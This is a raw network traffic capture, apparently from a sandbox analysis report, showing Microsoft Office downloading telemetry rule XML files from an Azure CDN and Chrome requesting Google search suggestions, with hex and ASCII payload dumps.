                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      32192.168.2.104973413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:20 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                      x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213820Z-174f7845968xlwnmhC1EWR0sv800000011v00000000085gv
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      33192.168.2.104973713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:20 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                      x-ms-request-id: 0c87a128-401e-0067-3a33-4209c2000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213820Z-174f7845968ljs8phC1EWRe6en00000011sg00000000g0fx
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      34192.168.2.104973913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:22 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 499
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                      x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213823Z-174f7845968jrjrxhC1EWRmmrs000000121g00000000ge32
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      35192.168.2.104974013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:22 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                      x-ms-request-id: e21e9151-601e-0097-6ab4-42f33a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213823Z-174f7845968glpgnhC1EWR7uec000000121000000000q3za
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      36192.168.2.104974113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                      x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213823Z-174f78459684bddphC1EWRbht400000011t0000000005qsq
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      37192.168.2.104974213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                      x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213823Z-174f7845968ljs8phC1EWRe6en00000011vg000000008r4g
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      38192.168.2.1049747142.250.181.1004435936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC603OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCNy9zQEIucrNAQi/0M0BCMbRzQEIutTNAQjK1s0BCKfYzQEI+cDUFRjymM0BGLnSzQEY642lFw==
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0frj-k4BH4q2aIiPdEVDWQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC124INData Raw: 38 33 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 75 69 20 66 6c 69 67 68 74 20 61 62 6f 72 74 65 64 20 63 61 62 69 6e 20 70 72 65 73 73 75 72 65 20 65 72 72 6f 72 22 2c 22 73 69 6b 61 6e 64 61 72 20 6b 61 20 6d 75 71 61 64 64 61 72 20 6d 6f 76 69 65 20 72 65 76 69 65 77 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20 74 6f 64 61 79 20 79 61 73 20 71 75 65 65 6e 22 2c 22
                                                                                                                                                                                                                                                      Data Ascii: 83d)]}'["",["tui flight aborted cabin pressure error","sikandar ka muqaddar movie review","nyt strands today yas queen","
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 6d 6c 62 20 6a 75 61 6e 20 73 6f 74 6f 22 2c 22 6f 61 68 75 20 77 61 76 65 73 22 2c 22 72 69 70 70 6c 65 20 78 72 70 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 73 74 61 6e 66 6f 72 64 20 66 6f 6f 74 62 61 6c 6c 20 61 6e 64 72 65 77 20 6c 75 63 6b 22 2c 22 64 69 73 6e 65 79 2b 20 73 75 62 73 63 72 69 70 74 69 6f 6e 20 62 6c 61 63 6b 20 66 72 69 64 61 79 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e
                                                                                                                                                                                                                                                      Data Ascii: mlb juan soto","oahu waves","ripple xrp price prediction","stanford football andrew luck","disney+ subscription black friday"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmN
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC602INData Raw: 41 34 63 31 56 69 62 45 6c 45 57 54 4a 36 4e 54 42 33 52 6c 6c 36 65 6e 63 79 61 30 52 36 4d 30 31 78 65 46 4a 4a 54 58 4d 33 62 6b 46 47 55 31 46 42 61 6c 46 4e 54 6b 52 6d 56 45 35 56 51 56 6f 7a 62 57 74 58 57 45 6c 4b 4e 58 4e 69 51 54 63 31 65 6e 51 7a 55 47 6c 6a 62 6a 6c 6e 53 46 56 6b 54 44 42 6c 4d 46 4d 33 61 6d 51 33 63 55 73 33 62 6e 64 72 59 33 5a 7a 4b 31 6b 78 51 6c 42 70 55 55 35 7a 61 79 39 4c 64 58 5a 34 57 48 4a 6a 61 30 39 7a 55 45 68 4f 54 56 5a 6f 61 30 4a 61 52 79 74 47 64 43 73 76 63 48 5a 52 4e 56 42 50 63 30 31 33 61 7a 42 36 56 57 5a 6a 55 6c 4a 35 5a 45 73 30 61 31 6f 78 55 47 67 33 63 6b 68 43 52 32 5a 4d 5a 6d 56 78 4e 33 51 78 4d 47 46 57 53 6c 45 30 61 7a 64 32 51 57 59 79 59 6c 64 6c 63 46 68 4f 64 7a 4e 46 55 45 78 51 51
                                                                                                                                                                                                                                                      Data Ascii: A4c1VibElEWTJ6NTB3Rll6encya0R6M01xeFJJTXM3bkFGU1FBalFNTkRmVE5VQVozbWtXWElKNXNiQTc1enQzUGljbjlnSFVkTDBlMFM3amQ3cUs3bndrY3ZzK1kxQlBpUU5zay9LdXZ4WHJja09zUEhOTVZoa0JaRytGdCsvcHZRNVBPc013azB6VWZjUlJ5ZEs0a1oxUGg3ckhCR2ZMZmVxN3QxMGFWSlE0azd2QWYyYldlcFhOdzNFUExQQ
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC91INData Raw: 35 35 0d 0a 68 4e 54 54 56 59 55 46 52 75 61 47 5a 45 53 32 5a 49 62 47 4e 6b 61 6a 6c 51 54 55 64 6e 62 6d 67 7a 4e 30 35 76 64 6e 5a 44 4e 6c 52 56 4e 79 74 58 4e 58 4e 76 57 6d 64 46 64 47 70 48 52 55 31 70 4e 30 67 34 56 57 70 6b 61 47 35 69 51 54 4a 51 54 47 35 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 55hNTTVYUFRuaGZES2ZIbGNkajlQTUdnbmgzN05vdnZDNlRVNytXNXNvWmdFdGpHRU1pN0g4VWpkaG5iQTJQTG5
